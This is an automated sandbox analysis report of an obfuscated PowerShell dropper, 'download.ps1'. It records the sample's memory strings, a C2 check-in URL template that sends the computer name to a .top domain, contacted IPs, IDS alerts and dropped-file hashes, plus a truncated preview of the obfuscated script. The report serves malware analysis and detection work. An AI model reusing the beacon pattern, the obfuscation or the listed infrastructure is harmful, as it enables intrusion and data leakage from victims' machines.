                                                                        http://$q0683ukmncpy7gl/$6feonrgjq9a5ulh.php?id=$env:computername&key=$buwjfgxalt&s=527powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FB5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.google.com/preferences?hl=enpowershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://0.google.powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://0.google.com/powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.2151716083.000002931E641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  142.250.186.36
                                                                                                  		www.google.comUnited States
                                                                                                  		15169GOOGLEUSfalse
                                                                                                  45.61.136.138
                                                                                                  		bfhdkgmmhdbikgj.topUnited States
                                                                                                  		40676AS40676UStrue

                                                                                                  General Information

                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1584946
                                                                                                  Start date and time:2025-01-06 20:01:04 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 4m 14s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:6
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:download.ps1
                                                                                                  Detection:MAL
                                                                                                  Classification:mal64.evad.winPS1@2/7@4/2
                                                                                                  EGA Information:Failed
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  • Number of executed functions: 13
                                                                                                  • Number of non-executed functions: 3
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .ps1

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2800 because it is empty
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: download.ps1

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  14:01:59API Interceptor45x Sleep call for process: powershell.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • bfhdkgmmhdbikgj.top/gz782b5rhjhtr.php?id=computer&key=73964595488&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • bfhdkgmmhdbikgj.top/8j3zac462bhtr.php?id=user-PC&key=66957681081&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/sgat4cebpihtr.php?id=computer&key=24472055606&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/g6n2wfvsr0htr.php?id=user-PC&key=95416299579&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/m15teydqhphtr.php?id=computer&key=27186586974&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/sce6dujwmhhtr.php?id=computer&key=21283751447&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/hlofm1brkshtr.php?id=user-PC&key=62803468549&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/aoter2umlhhtr.php?id=computer&key=39417889290&s=527
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • kcehmenjdibnmni.top/kqmlncu4i7htr.php?id=user-PC&key=66425560744&s=527

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  bfhdkgmmhdbikgj.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  LZUCldA1ro.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 207.231.107.137
                                                                                                  LZUCldA1ro.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 207.231.107.137
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  download.ps1Get hashmaliciousUnknownBrowse
                                                                                                  • 45.61.136.138
                                                                                                  Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 41.216.189.243
                                                                                                  armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 23.179.122.63

                                                                                                  JA3 Fingerprints

                                                                                                  No context

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:NlllulriAz:NllU2A
                                                                                                  MD5:88CD010331786B5B0D8F925A7B5EFE73
                                                                                                  SHA1:47B913E734AACA1331C5E8561FC01340D899A2DF
                                                                                                  SHA-256:58BC41921E8386AF7B31594E38A11BC63533D8D2B9D3803C640C3AAD8BD3CFF4
                                                                                                  SHA-512:437792D19577187888FC54489B47D34506E6275910DD03690A9BC746D23A906329251B2DBA227F82B39686C54A4E37A366DF5B5566F2387D57C882706B8D4E45
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:@...e.................................:.%............@..........

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23eswxp5.02a.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ywubyop.zme.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brcgjtus.pzf.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2fuj4sz.clw.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6222
                                                                                                  Entropy (8bit):3.7047371337904265
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:rAwXfN3CNEoCkvhkvCCtW4IoyHl4Io2SHv:rbDhW4S4R
                                                                                                  MD5:EDE6C4D175B0DD3A32C671CA5E7907C5
                                                                                                  SHA1:C16671B8CE90370D61B164730D67240ACE7A236F
                                                                                                  SHA-256:E2B7A4B67A90B28AF1928870066E07AA2378B8093EB3FE63E211248D86C9E0D7
                                                                                                  SHA-512:3B92C275DDD2032934EA52AEF6F9A1EDEEADE6CF5BF9A38227F35A0E456ECA3EFD048AC828BA21DA87F85DEAE0902F11E3AA428A71A90DB84B4CC7447A742AF1
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.".. ...d........dtm`..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....C..pm`..{.utm`......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl&Z7.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....&Z9...Roaming.@......DWSl&Z9.....C.......................e.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl&Z7.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl&Z7.....E....................._...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl&Z7.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl&Z7.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl&Z<.....q...........

                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OC1QLOMYWN8JZDX4X2UQ.temp

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6222
                                                                                                  Entropy (8bit):3.7047371337904265
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:rAwXfN3CNEoCkvhkvCCtW4IoyHl4Io2SHv:rbDhW4S4R
                                                                                                  MD5:EDE6C4D175B0DD3A32C671CA5E7907C5
                                                                                                  SHA1:C16671B8CE90370D61B164730D67240ACE7A236F
                                                                                                  SHA-256:E2B7A4B67A90B28AF1928870066E07AA2378B8093EB3FE63E211248D86C9E0D7
                                                                                                  SHA-512:3B92C275DDD2032934EA52AEF6F9A1EDEEADE6CF5BF9A38227F35A0E456ECA3EFD048AC828BA21DA87F85DEAE0902F11E3AA428A71A90DB84B4CC7447A742AF1
                                                                                                  Malicious:false
                                                                                                  Preview:...................................FL..................F.".. ...d........dtm`..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....C..pm`..{.utm`......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl&Z7.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....&Z9...Roaming.@......DWSl&Z9.....C.......................e.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl&Z7.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW r..Windows.@......DWSl&Z7.....E....................._...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl&Z7.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl&Z7.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl&Z<.....q...........

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:ASCII text, with very long lines (10716), with CRLF line terminators
                                                                                                  Entropy (8bit):5.981936613104156
                                                                                                  TrID:
                                                                                                    File name:download.ps1
                                                                                                    File size:19'664 bytes
                                                                                                    MD5:f44b774aac3ec4688531510b0c1eaf52
                                                                                                    SHA1:48e0b9a7650ff5b4294d6a5e6d4bdd6a113ffd1b
                                                                                                    SHA256:f0802f6ec8278c7b05dcfcc763107f37f4e78c24d87d881f9fa36dfe6918a36e
                                                                                                    SHA512:253a0f366c0edd5d942d8617d14b7c91e2de3d2900d9e3b806198b298a0b6fbfd98461c64eb25b5729c72359ef3b70fd5ac442277b49cd63f3eddd5e1409a750
                                                                                                    SSDEEP:384:bYPGNt7hmkZyaHP8Zt82RWkWFV0hFfHHGb4K/KFbAu2HFKy/:mGRF3P8Z62ZUV0hFfnVO2gFp
                                                                                                    TLSH:D2926CB63B8DFDD2C58BD62D2607BC087F45746FE0E65AC4AF19D1C263026547B86C81
                                                                                                    File Content Preview:$fvhtpujqnrdsi=$executioncontext;$eresonrereeredalaninalaten = -join (0..54 | ForEach-Object {[char]([int]"0000012700000126000001310000012400000130000001280000013000000129000001290000012400000130000001220000012300000129000001260000013000000128000001300000

                                                                                                    File Icon

                                                                                                    Icon Hash:3270d6baae77db44

                                                                                                    Network Behavior

                                                                                                    Suricata IDS Alerts

                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2025-01-06T20:02:05.019539+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.55390745.61.136.13880TCP
                                                                                                    2025-01-06T20:02:05.019539+01002057741ET MALWARE TA582 CnC Checkin1192.168.2.55390745.61.136.13880TCP
                                                                                                    2025-01-06T20:02:06.031749+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.553908142.250.186.3680TCP

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 6, 2025 20:02:03.784248114 CET5390653192.168.2.51.1.1.1
                                                                                                    Jan 6, 2025 20:02:03.789922953 CET53539061.1.1.1192.168.2.5
                                                                                                    Jan 6, 2025 20:02:03.790016890 CET5390653192.168.2.51.1.1.1
                                                                                                    Jan 6, 2025 20:02:03.790070057 CET5390653192.168.2.51.1.1.1
                                                                                                    Jan 6, 2025 20:02:03.796158075 CET53539061.1.1.1192.168.2.5
                                                                                                    Jan 6, 2025 20:02:04.249233961 CET53539061.1.1.1192.168.2.5
                                                                                                    Jan 6, 2025 20:02:04.251491070 CET5390653192.168.2.51.1.1.1
                                                                                                    Jan 6, 2025 20:02:04.256483078 CET53539061.1.1.1192.168.2.5
                                                                                                    Jan 6, 2025 20:02:04.256563902 CET5390653192.168.2.51.1.1.1
                                                                                                    Jan 6, 2025 20:02:04.262587070 CET5390780192.168.2.545.61.136.138
                                                                                                    Jan 6, 2025 20:02:04.267380953 CET805390745.61.136.138192.168.2.5
                                                                                                    Jan 6, 2025 20:02:04.267468929 CET5390780192.168.2.545.61.136.138
                                                                                                    Jan 6, 2025 20:02:04.270276070 CET5390780192.168.2.545.61.136.138
                                                                                                    Jan 6, 2025 20:02:04.275055885 CET805390745.61.136.138192.168.2.5
                                                                                                    Jan 6, 2025 20:02:04.968200922 CET805390745.61.136.138192.168.2.5
                                                                                                    Jan 6, 2025 20:02:04.982336044 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:04.987170935 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:04.987289906 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:04.987445116 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:04.992172956 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:05.019539118 CET5390780192.168.2.545.61.136.138
                                                                                                    Jan 6, 2025 20:02:06.031631947 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031656981 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031675100 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031692982 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031704903 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031716108 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031749010 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.031789064 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.031945944 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031959057 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031974077 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031989098 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.031994104 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.032047987 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.036590099 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.036602974 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.036613941 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.036655903 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.082041979 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.117407084 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121484995 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121496916 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121507883 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121550083 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.121583939 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.121656895 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121711016 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.121761084 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.126849890 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.126863003 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.126873970 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.126914978 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.133146048 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.133160114 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.133171082 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.133199930 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.133224010 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.139291048 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.139303923 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.139322042 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.139341116 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.145601988 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.145615101 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.145626068 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.145647049 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.145673990 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.151868105 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.151885033 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.151896000 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.151941061 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.158113956 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.158126116 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.158135891 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.158152103 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.158179998 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.164349079 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.164361954 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.164372921 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.164407015 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.170567989 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.170586109 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.170651913 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.211163998 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211194992 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211213112 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211276054 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.211440086 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211452007 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211467028 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211477995 CET8053908142.250.186.36192.168.2.5
                                                                                                    Jan 6, 2025 20:02:06.211493969 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.211534977 CET5390880192.168.2.5142.250.186.36
                                                                                                    Jan 6, 2025 20:02:06.212615967 CET8053908142.250.186.36192.168.2.5
